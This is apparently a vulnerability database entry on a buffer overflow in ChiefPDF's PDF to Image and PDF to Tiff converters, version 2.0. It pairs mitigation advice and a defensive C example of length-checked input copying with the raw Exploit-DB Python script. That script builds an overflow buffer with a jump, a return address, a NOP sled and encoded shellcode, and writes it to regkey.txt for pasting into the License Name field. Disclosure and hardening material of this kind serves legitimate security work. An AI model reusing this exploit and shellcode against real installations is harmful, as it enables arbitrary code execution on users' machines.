Vendor: PDF to Image Converter, PDF to Image Converter Free, PDF to Tiff Converter, PDF to Tiff Converter Free
By: metacom
CVSS: 9.3 (HIGH)
CWE: 119 (Buffer Overflow)
Product Name: PDF to Image Converter, PDF to Image Converter Free, PDF to Tiff Converter, PDF to Tiff Converter Free
Affected Version From: 2
Affected Version To: 2
Patch Exists: YES
Related CWE: N/A
CPE: chiefpdf
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Win-Xp-sp3, Win-7, Win-8.1
2014

ChiefPDF Software Buffer Overflow

ChiefPDF Software Buffer Overflow is a buffer overflow vulnerability in ChiefPDF software that allows an attacker to execute arbitrary code. It affects PDF to Image Converter 2.0, PDF to Image Converter Free 2.0, PDF to Tiff Converter 2.0, and PDF to Tiff Converter Free 2.0. The overflow is triggered when a maliciously crafted string is pasted into the 'Registration - License Name' field. The exploit code is written in Python and is available on the author's website.

Mitigation:

Users should avoid downloading and installing software from untrusted sources. Additionally, users should ensure that all software is up to date and patched with the latest security updates.
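
On the developer side, a CWE-119 overflow in a text field such as 'Registration - License Name' is closed by a length-checked, validated copy. The C example below is added here and is not ChiefPDF code or part of the original entry; the function names, the 64-byte limit and the printable-ASCII policy are assumptions, and the sample inputs are constructed.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define LICENSE_NAME_MAX 64 /* assumed field limit, not a value from the vendor */

typedef enum { LN_OK = 0, LN_INVALID, LN_TOO_LONG, LN_BAD_CHAR } ln_status;

/* Unsafe pattern (CWE-119): copies up to the NUL, ignoring the size of dst. */
void store_license_name_unsafe(char *dst, const char *input) {
    strcpy(dst, input);
}

/* Hardened form: the caller passes both sizes; oversized input is rejected
 * (not truncated) and only printable ASCII is accepted (an assumed policy). */
ln_status store_license_name(char *dst, size_t dst_size,
                             const char *input, size_t input_len) {
    if (dst == NULL || dst_size == 0 || input == NULL)
        return LN_INVALID;
    dst[0] = '\0'; /* dst is left as a valid empty string on any failure */
    if (input_len == 0)
        return LN_INVALID;
    if (input_len > LICENSE_NAME_MAX || input_len >= dst_size)
        return LN_TOO_LONG;
    for (size_t i = 0; i < input_len; i++) {
        unsigned char c = (unsigned char)input[i];
        if (c < 0x20 || c > 0x7e)
            return LN_BAD_CHAR;
    }
    memcpy(dst, input, input_len);
    dst[input_len] = '\0';
    return LN_OK;
}

int main(void) {
    char name[LICENSE_NAME_MAX + 1];
    char pasted[700]; /* constructed sample: oversized clipboard text */
    memset(pasted, 'A', sizeof pasted);

    printf("normal:    %d\n", store_license_name(name, sizeof name, "Alice Example", 13));
    printf("oversized: %d\n", store_license_name(name, sizeof name, pasted, sizeof pasted));
    printf("raw bytes: %d\n", store_license_name(name, sizeof name, "ab\xeb\x06", 4));
    return 0;
}
```

Rejecting instead of truncating keeps the stored name identical to what the user entered, and the early `dst[0] = '\0'` means a failed call never leaves stale or partial data in the buffer.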

Exploit-DB raw data:

#!/usr/bin/python
#Exploit Title:ChiefPDF Software Buffer Overflow 
#vulnerable programs:
#PDF to Image Converter 2.0
#PDF to Image Converter Free 2.0
#PDF to Tiff Converter 2.0
#PDF to Tiff Converter Free 2.0
#Software Link:http://www.soft32.com/publishers/chiefpdf/
#Author: metacom - twitter.com/m3tac0m
#Tested on: Win-Xp-sp3, Win-7, Win-8.1

#How to use:Copy the AAAA...string from regkey.txt and paste->Registration - License Name: 
buffer="A" * 544
buffer+="\xeb\x06\x90\x90"
buffer+="\x8B\x89\x03\x10"# 1003898B   5E   POP ESI 
buffer+="\x90" * 80
buffer+=("\xba\x50\x3e\xf5\xa5\xda\xd7\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
"\x33\x83\xc3\x04\x31\x53\x0e\x03\x03\x30\x17\x50\x5f\xa4\x5e"
"\x9b\x9f\x35\x01\x15\x7a\x04\x13\x41\x0f\x35\xa3\x01\x5d\xb6"
"\x48\x47\x75\x4d\x3c\x40\x7a\xe6\x8b\xb6\xb5\xf7\x3d\x77\x19"
"\x3b\x5f\x0b\x63\x68\xbf\x32\xac\x7d\xbe\x73\xd0\x8e\x92\x2c"
"\x9f\x3d\x03\x58\xdd\xfd\x22\x8e\x6a\xbd\x5c\xab\xac\x4a\xd7"
"\xb2\xfc\xe3\x6c\xfc\xe4\x88\x2b\xdd\x15\x5c\x28\x21\x5c\xe9"
"\x9b\xd1\x5f\x3b\xd2\x1a\x6e\x03\xb9\x24\x5f\x8e\xc3\x61\x67"
"\x71\xb6\x99\x94\x0c\xc1\x59\xe7\xca\x44\x7c\x4f\x98\xff\xa4"
"\x6e\x4d\x99\x2f\x7c\x3a\xed\x68\x60\xbd\x22\x03\x9c\x36\xc5"
"\xc4\x15\x0c\xe2\xc0\x7e\xd6\x8b\x51\xda\xb9\xb4\x82\x82\x66"
"\x11\xc8\x20\x72\x23\x93\x2e\x85\xa1\xa9\x17\x85\xb9\xb1\x37"
"\xee\x88\x3a\xd8\x69\x15\xe9\x9d\x86\x5f\xb0\xb7\x0e\x06\x20"
"\x8a\x52\xb9\x9e\xc8\x6a\x3a\x2b\xb0\x88\x22\x5e\xb5\xd5\xe4"
"\xb2\xc7\x46\x81\xb4\x74\x66\x80\xd6\x1b\xf4\x48\x37\xbe\x7c"
"\xea\x47")
file = open('regkey.txt','wb')
file.write(buffer);
file.close()